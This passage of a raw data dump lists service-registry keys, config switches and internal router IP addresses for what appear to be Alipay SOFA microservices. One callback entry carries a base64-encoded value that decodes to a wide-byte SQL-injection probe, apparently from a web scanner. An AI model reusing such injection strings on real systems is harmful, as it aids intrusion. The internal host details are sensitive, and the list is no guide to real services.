ID#@#SOFA.DRM","com.alipay.vehownerprod.facade.material.MaterialServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dsmp.common.service.facade.monitor.MonitorTransferRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finslip.common.service.facade.recon.ReconRecoveryStatisticsService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.finpwm.FinpwmSavingPlanQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paydecision.service.api.PayChannelDecisionService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.drm.insmobiledrmhandler.brokenScreenInsuranceExpireTime,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_adjustLpaOverDraftProcessCallBack3@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.xview.core.common.facade.CacheQueryProviderService:1.0:alipassprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csinsight.core.engine.api.facade.DataQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.riskmngPunishcenterTairCache.czoneSwitchMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acmarketingcore.common.service.facade.coupon.CouponTemplateManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:pcreditprod.freezeOrderTransfer@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.zqualitywalleetoe.common.service.facade.api.WalleExternalServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.emcooperate.common.service.facade.ShiftServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.42.107#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbasset.common.service.facade.stuff.api.StuffStockQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.accordercore.query.SingleAmtCtlQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchmobile.common.service.client.api.MemberPromotionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.scenelib.SceneContentQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:onecheckbff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.177.22#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.fraudmng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.checkIntervalWhenDisableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openitemcore.common.service.facade.api.tool.TradeRetryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.infosec.api.InfoSecCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchasset.common.service.facade.sninvalid.AssetInvalidationRecordQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.zcache.tbase.addpInsttradeTairRz.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","HEALTHY_V2@dchainconsole#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.contentfactory.common.service.facade.appx.AppServiceRecognizeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkprodmng_priceAndSettleCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.core.service.scheduler.SchedulePointService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:mobilesearch@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesecurity.common.service.api.auth.AuthFacade:1.0:mobilesecurity@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableJdkSerializeBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpdcore:name=com.alipay.fin.pdcore.common.util.prodquery.PQDRMConfig.remotecacheQueryRoad,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitydata.common.service.facade.fasttext.FastRuntimeService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.AntVipDefaultAppName:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.asyncGetVipDomainsIntervalMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditdmp.facade.PcdmpInstIndexDataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antcloud.component.endpoint.sofarest.ServiceParametersRestService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.tradequery.common.service.facade.TradeRefundQueryFacade:1.0:tradequeryhis@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_B_FOPSHOP_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","HEALTHY_V2@antlegalchain#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.mybank.bketencop.facade.api.TaskConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.speech.api.userspeech.UserSpeechFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rccenter.common.service.facade.RccenterDecisionConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finreconchecker.common.service.facade.service.DataCollectMngServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.84.35#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.dmeta.facade.businessprofile.BusinessProfileFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbaservice.common.service.facade.contactmanage.api.FinancingNotifyTypeQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpublishuiweb:name=com.alipay.common.security.dresource.SecurityCommonDrm.htmRefererCheckerEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.riskmng:name=com.alipay.riskmng.core.service.drm.impl.TaskSwitchResourceImpl.sync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.routeclient.interfacename:gzmsact-prempromo#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cif.user.UserInfoQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.19.28.156#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.alideviceinfo.biz.listen.iot.handler.IotThingShadowHandler:1.0:iotDeviceAppInfo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socplt.common.service.facade.RiskEventSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:cfcoopration@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.ipay.imerchantsettle.common.service.facade.api.MerchantBillQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.finfundbankcore.common.service.facade.FundBankRedeemFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:yuyanbff#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alibaba.dataphin.warehouse.plan.common.facade.api.DataCellCatalogApi:1.0:dpplanning@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.177.34#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","_CLIENTSERVICE_TEST_10_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.prodquery.common.service.facade.standard.api.arrangement.ArrangementPageQueryStdFacade:1.0:mainSite@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bpaas.ecogw.facade.CloudGwApiInvokeFacade:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.ScriptEvalServiceFacade:1.0:antsecurity_mctcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finatp.common.service.facade.signtool.ExpressSimpleSignService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.developer.DeveloperMobileFastAuditFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbbuservice.common.service.facade.OperatorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.progov.service.api.CollectionArddRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:adcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.100.92#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.superapi.common.core.client.AppInvokeService:1.0:mfrontgw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.variable.facade.VariablePriorityQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.comparacenter.common.service.facade.ComParaOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.cif.facade.CreditAgreementQueryService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:etetestprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:barcodeprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudbox:name=com.alipay.common.security.dresource.SecurityCommonDrm.corsWhiteHostList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.amsAssistantTBaseCache.legacyRwWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.loancore.common.service.facade.alipay.api.rzone.ZlcRiskRzoneService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.batchfund.common.service.facade.trans.api.BatchTransDetailQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:corgiunit@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudinc:name=com.alipay.common.tracer.manage.TracerDrm.disableMiddlewareDigestLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.analyze.biz.manager.localprofile.drmpush.LocalProfileDrmPushManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.search.MainSearchFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.client.qaZQueue13#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.ebillcenter:name=com.alipay.ebillcenter.common.service.facade.ldc.drm.ThresholdDeductMigrationResource.whitePhoneTailResource,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.commandcenter:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.paramCheckDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.rccenter.common.report.facade.disclose.RccenterDiscOpenPubFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unitestcenter.biz.rulecenter.service.ApCaseMigrateService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdatacontext:name=com.alipay.datacontextlib.dataswap.spi.drm.DataSwapGlobalParamDrm.mergeSerialize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.walle.service.facade.api.TipsServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:mservice_workflow_workflowProcessorStatusGateway@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promomng.biz.promoworkbench.MarketingPlanManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.ambush.netmock.rule.NetmockRuleCoordinator.netmockRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.etetestcore.service.api.YuemaContentService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kborderaccept.common.service.facade.order.OrderListQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antiep.common.service.facade.AntiepSCAssetsDataTransferFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_INSUSERCORE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.transferprod.common.service.facade.api.YebTimingTransferFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloanapply.common.service.facade.service.solidify.SolidifyManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.ptcore.common.service.facade.api.prodsale.ProdSaleRelationConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scardcenter.common.service.facade.KmiToolFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.acquirecenter.service.facade.api.OrderRefundService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.groot:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.cityVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.timeout.common.service.facade.api.TimeoutOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappconfig.common.service.facade.api.AppInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dmeta.facade.virtualcanvas.DmetaVirtualCanvasDomainReadFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.apshopcenter.GmShopService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.sqlExtEscapeRuleString,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.icfmng.common.service.facade.api.VoucherQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mfinquotationprod.common.service.facade.api.HotPlateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.spcenter.facade.bd.BdOrganizationManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:riskNameListSaveCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:JWJmJ1x0T3JcdGFudHdlYnNjYW5zWVc1MD1PREF4TURJd05UTXRMVEV4TURBd01qQXlNZw==@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.177.56#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.50.74.120#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.fininfo:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.limiter,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cif.test.facade.DataTestService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.54.11#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ismonitor.biz.censor.hitchqualitative.UsabilityQualitativeManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.253.67#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchprod.common.service.facade.merchant.MrchProdImageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:tradecore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instasset.common.service.integration.masterdata.result.code.StdResultCode3rdQueryFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:secuprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinbaseprod.common.service.facade.api.SpiTestFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.certify.service.facade.CertifyInfoSupplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.batchpay.service.batch.bwfb.api.WithholdingQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finauth.common.service.facade.account.service.InstL2AccountQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.72.58#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.Arch:name=com.alipay.tradeexprod.service.integration.drm.resource.SwitchToUtpResource.oldProducts,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.findatacanal.common.service.manage.strategy.StrategyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdmng.common.service.facade.AlibabaEmployeeAccountFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finrepaycenter.common.service.facade.FileRepayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","tets#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.etetestcore.service.api.yebplus.YebPlusTransOutQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yqcore.common.service.ha3.query.service.Ha3Service:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clearingcenter.facade.api.ClearingRetailSumResultApplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.MerchantGzonePageQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fininsightcore.common.service.facade.interpretablecopy.api.InterpretableCopyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassettrade.common.service.facade.api.AssetTradeOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finconsumeprod.facade.mng.PhyGoldTradeMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcenter.common.service.facade.McenterMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.biz.daemon.drm.DiscountBizParamResource.maxWhitelist,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.nodejs.ConsumerService:1.0:kbbmsweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctrans.service.facade.AccountVoucherFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acprodapicore.facade.service.ApiPackServiceFacade:1.0:product@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoinsprod.common.mkt.AutoCampaignFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassetpreference.api.facade.FundMultiDimEvaluationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.basic.library.facade.BasicLibraryQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_fundAmountFreeze_syscall2@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.FundPeriodAssetQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.service.facade.ShortLinkFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finquotationcenter.common.service.facade.api.indicator.IndicatorQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.common.service.facade.AppointmentWalletRedDotFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromoscene.common.service.facade.api.luckyfish.prize.LuckyFishDrawPrizeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S_MOBILEHA_ALARM_SCHEDULER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.mobilemock.common.service.facade.api.RpcLimitServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.riskmng:name=com.alipay.riskmng.biz.platform.task.export.drm.ExportResource.strOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.findtprod:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.responseExceptionIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ordermng.common.service.api.order.ProtocolEmailService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mrchcommerce.mrchlabcore.common.service.facade.api.template.ItemTemplateQueryGzoneFacde:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_11.124.4.96#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbsearch.common.service.facade.api.dictionary.DictionaryManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:finassistantmng@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxagg.common.service.facade.api.management.scene.AggSceneMngQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebplus.common.facade.service.api.query.YebsDailyLimitQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.routeclient.DefaultRouteCoordinator.ipWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.bkassetmore.common.service.facade.api.InstFundsServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_RCEDUCENTER#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finlsmicrogw.common.service.facade.gateway.api.EdgeConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_PCREDITQUERY#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finconsumeprod:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.etetestcore.service.api.kborderprod.KopOrderCloseService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.task.TaskScheduleManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openinsight.common.service.facade.search.api.SearchProductLindormFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.airprod.common.service.facade.partner.AirPlatformFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findefencecore.common.service.algorithmtest.api.AnnaScriptRecFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:tradeexprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promobench.common.service.facade.service.TenantJarManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.accordercore.api.UnfreezeAccOrderService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openauth.common.service.facade.rpc.PreAuthManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:ssecode_updateCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.almcenter.service.facade.api.fundredeem.RedeemFinanceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:tiyubiz@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.30.67#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:testzs@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebcore.common.facade.service.FinVirtualProfitProcessService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.v2.stream.facade.ClusterQuestionQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.userview.config.facade.UserLabelSubscribeManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.vouchercore.facade.api.voucher.VoucherManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openinsight.common.service.facade.box.api.ServiceBoxQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcube.common.service.facade.openapi.upgrade.UpgradePackageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcbmarketcenter:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.ioErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cfpcenter:name=com.alipay.routeclient.DefaultRouteCoordinator.idcDomainScope,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.inscharity.common.service.facade.ProjectFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S_finhinetcore_consumer#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finpromobus.common.service.facade.mangrove.MangroveManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_FINDECISION#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.appxprod.common.service.facade.api.metatree.MetaMappingQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instasset.common.client.EnumDictQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.ordercore.ConsumerServiceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","inscontentprod@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.astaralarm.common.service.facade.sac.StarAgentCollectionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.productpkg.SmartAntPkgMgrFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.zdal.ldc.tair.addpLoadtestTair.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.financemng.common.facade.service.robot.EmcsqlServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilec